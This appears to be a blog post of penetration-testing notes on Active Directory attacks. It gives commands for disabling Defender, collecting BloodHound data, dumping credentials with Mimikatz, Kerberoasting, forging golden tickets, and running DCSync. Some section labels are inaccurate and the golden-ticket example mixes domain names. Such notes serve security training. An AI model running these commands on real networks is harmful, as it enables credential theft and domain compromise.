← Back to Blog

Active Directory Exploitation

Type: Technical Notes Category: Active Directory
Active Directory Pass-The-Hash Kerberoasting Mimikatz BloodHound

AD: General Pathways

A few of the many exploitation pathways:

  • Exploiting a web-app --> lateral movement throughout the network --> domain compromise
  • Exploiting a network/service vulnerability --> lateral movement throughout the network --> domain compromise
  • Exploiting a client-side attack to compromise a user --> lateral movement --> domain compromise

Attack Methods

  • Pass-The-Hash
  • Pass-The-Ticket
  • Overpass-The-Hash
  • Kerberoasting
  • AS-REP Roasting
  • Golden Ticket
  • Silver Ticket
  • Password Spraying

AD: Enumeration and Assessment

After gaining access to a machine within an AD network, it is essential to enumerate the environment and understand the network, the domain, the machines within it, and where the compromised machine stands in relation to the environment (permissions, groups, routes to admin, etc.).

Enumeration of AD can be done in various ways. Popular and useful tools include sharphound/bloodhound, powerview, impacket, and powershell.

Useful Resources

Tools

  • Impacket suite: psexec.py, wmiexec.py, smbexec.py
  • crackmapexec
  • powerview
  • sharphound / bloodhound
  • mimikatz
  • pypykatz
  • winpeas / windows privescheck
  • ldapmonitor
  • responder
  • rubeus
  • kerbrute

PowerView Commands

Disable Monitoring:

Set-MpPreference -DisableRealtimeMonitoring $true

Get Domain Info:

Get-Domain
Get-DomainController
Get-Domain -Domain domain.local
Get-DomainController -Domain domain.local
Get-DomainUser
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
Invoke-ShareFinder
Invoke-MapDomainTrust

Using BloodHound

Workflow: File transfer --> download sharphound --> exfiltrate the data --> view data in bloodhound --> identify valuable accounts or pathways within the domain --> use relevant tools to exploit those accounts and move laterally

Run SharpHound:

.\sharphound.exe -c Default, GPOLocalGroup, LoggedOn --zipfilename output

Mimikatz - Find Vulnerable Accounts

privilege::debug

sekurlsa::logonPasswords

Pass the Ticket Example

Identify service principals:

Use Get-UserSPNs.ps1

Request ticket for vulnerable SPN (PowerShell method):

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN'

Mimikatz method (example - SPN is mssqlserver):

kerberos::purge
kerberos::list
kerberos::ask /target:mssqlserver
kerberos::list /export

Golden Ticket:

kerberos::golden /user:admin /domain:corp.com /sid:S-1-5-21-xxx-xxxx-xxxxx /target:domain.com /service:MSSQLServer /rc4:hash /ptt

Accessing the DC with Admin Privileges

PsExec64.exe \\domain-dc01\ cmd.exe
pushd \\domain-dc01\c$
cd \\domain-dc01\c$

DCSync Attack:

lsaDump::dcsync /user:krbtgt

lsadump::lsa /inject /name:krbtgt